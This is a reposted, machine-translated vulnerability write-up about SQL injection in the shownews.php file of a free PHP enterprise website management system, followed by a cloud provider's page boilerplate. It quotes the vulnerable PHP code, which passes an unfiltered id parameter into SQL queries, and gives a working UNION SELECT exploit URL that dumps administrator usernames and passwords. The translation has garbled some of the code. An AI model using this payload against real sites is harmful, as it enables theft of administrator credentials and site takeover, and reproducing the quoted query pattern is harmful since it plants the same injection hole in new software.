V2.0 shownews.php Injection Vulnerability in PHP Enterprise website management System

Source: Internet
Author: User

Program name: Network PHP Enterprise website Management System 2.0 free version

The following is a brief description of the system's features:

1, the use of DIV+CSS layout tested compatible with IE and Firefox mainstream browser, other browsers have not been tested.

2, product news level three unlimited classification.

3, backstage can set up such as Administrator account password, site title, the bottom of the site copyright and other information.

4. Backstage with the latest version of Xheditor Editor, Xheditor is a cross-platform open source mini XHTML editor component based on jquery development.

5, Backstage image column can be related to the slide, links, Logo,banner, etc. to modify the settings.

5, backstage can delete product news in bulk.

Vulnerability file shownews.php, here is the program section code:

<?PHPinclude_once("wzdy.php");if(isset($_get[' ID ']))//detects if the ID variable is set{    $id=$_get["id"];} Else{          Echo"<script language= ' JavaScript ' >"; Echo"Alert (' Please enter the correct id! ‘);"; Echo"Location= ' index.php ';"; Echo"</script>"; Exit; }    $sql 4= "SELECT * FROM news where id=$id";//unfiltered the ID variable directly into the SQL query statement, output to the $SQL4 variable    $result 4=mysql_query($sql 4);//assigning the $SQL4 variable to the $RESULT4 variable    if($nums=mysql_num_rows($result 4))//returns the result of the $RESULT4 variable, which means that the $title variable, $content variable, shows the result of the maliciously injected statement we constructed    {           $rs 4=Mysql_fetch_array($result 4); $title=$rs 4["title"]; $content=$rs 4["Content"]; $hits=$rs 4["Hits"]; $FBSJ=Date("Y-m-d",Strtotime($rs 4[' FBSJ '])); $sql= "Update news set hits=hits+1 where id=$id"; mysql_query($sql); } Else {Echo"<script language= ' JavaScript ' >"; Echo"Alert (' Please enter the correct id! ‘);";Echo"Location= ' index.php ';"; Echo"</script>";Exit; }?>

Vulnerability Exp:

Http:// and 1=2 UNION SELECT 1,2,unhex (Hex (concat (0x5e5e5e, username,0x7c,password,0x5e5e5e)), 4,5,6,7 from gly

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.